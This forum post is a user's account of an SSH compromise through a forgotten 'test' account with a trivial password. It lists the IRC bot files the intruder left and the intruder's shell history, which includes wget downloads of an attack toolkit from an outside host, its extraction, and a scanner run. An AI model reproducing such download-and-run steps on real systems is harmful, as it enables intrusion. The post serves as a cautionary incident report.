Here's what I found out. The other day, I noticed a failed SSH login on my little syslog scroller to the user named "test". I completely forgot that such a user existed, but thinking about it, I'm pretty sure that when I first installed gentoo on this machine 3 years ago, I made an account with the username AND password of "test", and I guess I forgot to delete it. Now you see why I say I got what I deserved. I decided that I should delete the account, and when I went to delete it's home directory, I noticed that a directory named "1", had been created. Inside that directory was a directory called "lib", and in the lib directory was a program I had never seen before. Here's the ls output:
Code: Select all
total 893
-rw-r--r-- 1 1013 users 166154 Aug 7 02:10 Born2Kill.seen
-rw------- 1 1013 users 17982 Oct 9 2000 COPYING
-rw-r--r-- 1 1013 users 122242 Aug 7 02:12 LinkEvents
-rw------- 1 1013 users 2147 Oct 9 2000 Makefile
-rw------- 1 1013 users 3398 Nov 8 2000 README
-rw------- 1 1013 users 1569 Oct 9 2000 TODO
-rw------- 1 1013 users 25722 Nov 8 2000 VERSIONS
-rwx------ 1 1013 users 936 Dec 21 2003 checkmech
-rwx------ 1 1013 users 20290 Oct 9 2000 configure
-rwx------ 1 1013 users 474228 Sep 29 2001 crond
-rw-r--r-- 1 1013 users 111 Aug 7 02:00 emech.users
-rw-r--r-- 1 1013 users 76 May 27 2003 knopki.seen
-rw------- 1 1013 users 22935 Oct 9 2000 mech.help
-rw-r--r-- 1 1013 users 1085 Aug 7 02:00 mech.levels
-rw------- 1 1013 users 6 Aug 3 19:49 mech.pid
-rw-r--r-- 1 1013 users 484 Aug 7 02:00 mech.session
-rw------- 1 1013 users 4842 Jul 28 02:29 mech.set
-rw-r--r-- 1 1013 users 4862 Jul 28 02:33 mech.setes
drwx------ 2 1013 users 304 Nov 8 2000 randfiles
drwx------ 2 1013 users 1184 Sep 29 2001 src
Code: Select all
w
ls
dir
cd\
hash
cd /bin/ls
ls
mkdir 1
ls
cd 1
passwd
passwd
passwd
ls
w
uname -a
cd /var
ls
cd mail
ls
test
./tets
./test
wget
cd
ls
rm -rf 1
ls
cd /sbin
ls
mkdir 1
wget
wget born2kill.100free.com/run.tar
cd
mkdir 1
cd 1
wget born2kill.100free.com/run.tar
ls
tar xzvf run.tar
tar xvf run.tar
ls
cd run
ls
./sc 168 32773 25 150
uptime
I'm not too worried about having been hacked, as I was planning on replacing my hard drive within a week or two and starting fresh anyways. This time I'll be more careful, obviously.
mod edit: Sticky
amne
edit2: 2006-04-10 unstuck
amne




